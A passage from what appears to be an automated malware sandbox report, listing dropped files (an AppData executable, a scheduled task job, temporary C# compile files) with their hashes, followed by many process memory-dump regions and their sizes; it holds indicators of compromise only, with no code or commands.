                                                                                                                                                                                                                  401345fb43cb0cec5feb5d838afe84e0f1d0a1d1a299911d36b45e308f328f17

                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                  495f186a3fe70adeaf9779159b0382c33bf0d41fe3fe825a93249e9e3495a7603b0dd8f64ca664ea476a6bafd604425bf215b90b340a1558abe2bf23119e5195

                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  1.6MB

                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                  1dc908064451d5d79018241cea28bc2f

                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                  f0d9a7d23603e9dd3974ab15400f5ad3938d657a

                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                  d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454

                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                  6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

                                                                                                                                                                                                                • C:\Windows\Tasks\Test Task17.job

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  238B

                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                  bbd9a87adbec45fa95b3d6732b2a86b1

                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                  808956cfa42f7c6f9b5071514b9a401cf0e53672

                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                  430fbf5e624d62fd19c716dc9ce7b6b9e0e7e0ee99abf428936eed4fdec00d34

                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                  9b19eca2d892ba8b0b5a4f3e325996d4efce4c478418b5771f0824278d6c79a617dbd219874dd2886ce1dbff7e16802135f70ace0c3327ef870959e2119d3b7d

                                                                                                                                                                                                                • \??\c:\Users\Admin\AppData\Local\Temp\spfwia3k\spfwia3k.0.cs

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  941B

                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                  1809fe3ba081f587330273428ec09c9c

                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                  d24ea2ea868ae49f46c8a7d894b7fda255ec1cd9

                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                  d07a0c5fdf0862325608791f92273e0fc411c294f94d757f1ff0303ba5e03457

                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                  e662420fc93a5cefd657f7701432924e6a06482ea147ad814d5e20b16b2f3c13ed2cc6b9caf24c22b7a5b24ad0aa1d216c5804c46d2250522cfc2cadc69f9e28

                                                                                                                                                                                                                • \??\c:\Users\Admin\AppData\Local\Temp\spfwia3k\spfwia3k.cmdline

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  369B

                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                  831ea88eda963043e5738fa3d0795bf0

                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                  429eed4c9991fbd1f96fcaf61a5b753dbfc2ee4a

                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                  c8a9a925e1955ed5dbf57998704ece224319b06cab9c00232817861096a50da7

                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                  ccbdfcfc2c30bc265c3c33a827820098de2a40ef2abb69f50615bb9e72715e21eba59b9e2103d35f41889548ac5f8a095ca537288918b824272f40db614e8fa2

                                                                                                                                                                                                                • memory/2236-2092-0x00000000008D0000-0x0000000000FCE000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  7.0MB

                                                                                                                                                                                                                • memory/2236-3460-0x00000000008D0000-0x0000000000FCE000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  7.0MB

                                                                                                                                                                                                                • memory/2236-2041-0x00000000008D0000-0x0000000000FCE000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  7.0MB

                                                                                                                                                                                                                • memory/2452-633-0x000002E27F8E0000-0x000002E27F902000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                • memory/2472-117-0x0000000000400000-0x0000000000840000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.2MB

                                                                                                                                                                                                                • memory/2472-1860-0x0000000000400000-0x0000000000840000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.2MB

                                                                                                                                                                                                                • memory/2472-2025-0x0000000000400000-0x0000000000840000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.2MB

                                                                                                                                                                                                                • memory/2472-851-0x0000000000400000-0x0000000000840000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.2MB

                                                                                                                                                                                                                • memory/2472-685-0x0000000000400000-0x0000000000840000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.2MB

                                                                                                                                                                                                                • memory/2472-616-0x0000000000400000-0x0000000000840000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.2MB

                                                                                                                                                                                                                • memory/2472-613-0x0000000000400000-0x0000000000840000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.2MB

                                                                                                                                                                                                                • memory/2568-47-0x0000000000870000-0x0000000000D24000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.7MB

                                                                                                                                                                                                                • memory/2568-32-0x0000000000870000-0x0000000000D24000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.7MB

                                                                                                                                                                                                                • memory/2584-775-0x0000000000890000-0x0000000000D44000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.7MB

                                                                                                                                                                                                                • memory/2584-74-0x0000000000890000-0x0000000000D44000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.7MB

                                                                                                                                                                                                                • memory/2584-1278-0x0000000000890000-0x0000000000D44000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.7MB

                                                                                                                                                                                                                • memory/2584-657-0x0000000000890000-0x0000000000D44000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.7MB

                                                                                                                                                                                                                • memory/2584-48-0x0000000000890000-0x0000000000D44000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.7MB

                                                                                                                                                                                                                • memory/2584-559-0x0000000000890000-0x0000000000D44000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.7MB

                                                                                                                                                                                                                • memory/2636-2598-0x0000000000650000-0x000000000128F000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  12.2MB

                                                                                                                                                                                                                • memory/2636-2854-0x0000000000650000-0x000000000128F000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  12.2MB

                                                                                                                                                                                                                • memory/2636-2938-0x0000000000650000-0x000000000128F000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  12.2MB

                                                                                                                                                                                                                • memory/2968-828-0x0000000000810000-0x0000000000870000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  384KB

                                                                                                                                                                                                                • memory/3036-2066-0x0000000000840000-0x0000000000B4F000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  3.1MB

                                                                                                                                                                                                                • memory/3036-2471-0x0000000000840000-0x0000000000B4F000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  3.1MB

                                                                                                                                                                                                                • memory/3036-2487-0x0000000000840000-0x0000000000B4F000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  3.1MB

                                                                                                                                                                                                                • memory/3516-789-0x000000000CD40000-0x000000000D5C3000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8.5MB

                                                                                                                                                                                                                • memory/3628-165-0x0000000000790000-0x0000000000E8E000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  7.0MB

                                                                                                                                                                                                                • memory/3628-1864-0x0000000000790000-0x0000000000E8E000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  7.0MB

                                                                                                                                                                                                                • memory/3628-1238-0x0000000000790000-0x0000000000E8E000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  7.0MB

                                                                                                                                                                                                                • memory/3628-732-0x0000000000790000-0x0000000000E8E000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  7.0MB

                                                                                                                                                                                                                • memory/3628-653-0x0000000000790000-0x0000000000E8E000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  7.0MB

                                                                                                                                                                                                                • memory/3628-1955-0x0000000000790000-0x0000000000E8E000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  7.0MB

                                                                                                                                                                                                                • memory/3628-652-0x0000000000790000-0x0000000000E8E000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  7.0MB

                                                                                                                                                                                                                • memory/3960-832-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  164KB

                                                                                                                                                                                                                • memory/3960-833-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  164KB

                                                                                                                                                                                                                • memory/4204-17-0x0000000006450000-0x000000000646E000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                • memory/4204-16-0x0000000006070000-0x00000000063C4000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  3.3MB

                                                                                                                                                                                                                • memory/4204-6-0x0000000005E20000-0x0000000005E86000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  408KB

                                                                                                                                                                                                                • memory/4204-18-0x0000000006710000-0x000000000675C000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  304KB

                                                                                                                                                                                                                • memory/4204-5-0x0000000005DB0000-0x0000000005E16000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  408KB

                                                                                                                                                                                                                • memory/4204-4-0x00000000054B0000-0x00000000054D2000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                • memory/4204-19-0x0000000007BA0000-0x000000000821A000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  6.5MB

                                                                                                                                                                                                                • memory/4204-20-0x0000000006970000-0x000000000698A000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  104KB

                                                                                                                                                                                                                • memory/4204-22-0x00000000079C0000-0x0000000007A56000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  600KB

                                                                                                                                                                                                                • memory/4204-3-0x0000000005780000-0x0000000005DA8000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  6.2MB

                                                                                                                                                                                                                • memory/4204-2-0x0000000002E70000-0x0000000002EA6000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  216KB

                                                                                                                                                                                                                • memory/4204-23-0x0000000007950000-0x0000000007972000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                • memory/4204-24-0x00000000087D0000-0x0000000008D74000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  5.6MB

                                                                                                                                                                                                                • memory/4316-1877-0x00007FF632200000-0x00007FF632AC4000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8.8MB

                                                                                                                                                                                                                • memory/4316-1879-0x00007FF632200000-0x00007FF632AC4000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8.8MB

                                                                                                                                                                                                                • memory/4316-1865-0x00007FF632200000-0x00007FF632AC4000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8.8MB

                                                                                                                                                                                                                • memory/4316-1866-0x00007FF632200000-0x00007FF632AC4000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8.8MB

                                                                                                                                                                                                                • memory/4316-1875-0x000001F2C3DC0000-0x000001F2C3DE0000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  128KB

                                                                                                                                                                                                                • memory/4316-1874-0x00007FF632200000-0x00007FF632AC4000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8.8MB

                                                                                                                                                                                                                • memory/4316-1878-0x00007FF632200000-0x00007FF632AC4000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  8.8MB

                                                                                                                                                                                                                • memory/4360-787-0x000002C13DA70000-0x000002C13DA78000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                • memory/4508-88-0x0000000000DA0000-0x000000000149E000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  7.0MB

                                                                                                                                                                                                                • memory/4508-569-0x0000000000DA0000-0x000000000149E000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  7.0MB

                                                                                                                                                                                                                • memory/4508-680-0x0000000000DA0000-0x000000000149E000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  7.0MB

                                                                                                                                                                                                                • memory/4508-729-0x0000000000DA0000-0x000000000149E000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  7.0MB

                                                                                                                                                                                                                • memory/4508-608-0x0000000000DA0000-0x000000000149E000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  7.0MB

                                                                                                                                                                                                                • memory/4508-97-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  972KB

                                                                                                                                                                                                                • memory/5196-771-0x0000000000890000-0x0000000000D44000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.7MB

                                                                                                                                                                                                                • memory/5216-1930-0x0000000000500000-0x0000000000BEE000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  6.9MB

                                                                                                                                                                                                                • memory/5216-2006-0x0000000000500000-0x0000000000BEE000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  6.9MB

                                                                                                                                                                                                                • memory/5388-731-0x00000000004C0000-0x000000000095B000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.6MB

                                                                                                                                                                                                                • memory/5388-675-0x00000000004C0000-0x000000000095B000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.6MB

                                                                                                                                                                                                                • memory/5516-2524-0x0000000000220000-0x000000000091E000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  7.0MB

                                                                                                                                                                                                                • memory/5516-2052-0x0000000000220000-0x000000000091E000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  7.0MB

                                                                                                                                                                                                                • memory/5516-1995-0x0000000000220000-0x000000000091E000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  7.0MB

                                                                                                                                                                                                                • memory/5556-1252-0x0000000000700000-0x0000000000BA1000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.6MB

                                                                                                                                                                                                                • memory/5556-1863-0x0000000000700000-0x0000000000BA1000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.6MB

                                                                                                                                                                                                                • memory/5624-1895-0x000002B5D4180000-0x000002B5D46A8000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  5.2MB

                                                                                                                                                                                                                • memory/5624-751-0x000002B5B9700000-0x000002B5B9712000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  72KB

                                                                                                                                                                                                                • memory/5624-752-0x000002B5BB370000-0x000002B5BB380000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                • memory/5648-721-0x0000000000400000-0x0000000000466000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  408KB

                                                                                                                                                                                                                • memory/5648-716-0x0000000000400000-0x0000000000466000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  408KB

                                                                                                                                                                                                                • memory/5916-1251-0x0000000000400000-0x0000000000840000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.2MB

                                                                                                                                                                                                                • memory/5916-1279-0x0000000000400000-0x0000000000840000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.2MB

                                                                                                                                                                                                                • memory/5916-769-0x0000000000400000-0x0000000000840000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.2MB

                                                                                                                                                                                                                • memory/5920-706-0x0000000000BB0000-0x0000000000C20000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  448KB

                                                                                                                                                                                                                • memory/6332-2540-0x00000000006F0000-0x0000000000768000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  480KB

                                                                                                                                                                                                                • memory/6384-2541-0x0000000000890000-0x0000000000D44000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.7MB

                                                                                                                                                                                                                • memory/6384-2546-0x0000000000890000-0x0000000000D44000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  4.7MB

                                                                                                                                                                                                                • memory/6752-2569-0x0000000000720000-0x000000000113D000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  10.1MB

                                                                                                                                                                                                                • memory/6752-2462-0x0000000000720000-0x000000000113D000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  10.1MB

                                                                                                                                                                                                                • memory/6752-2611-0x0000000000720000-0x000000000113D000-memory.dmp

                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                  10.1MB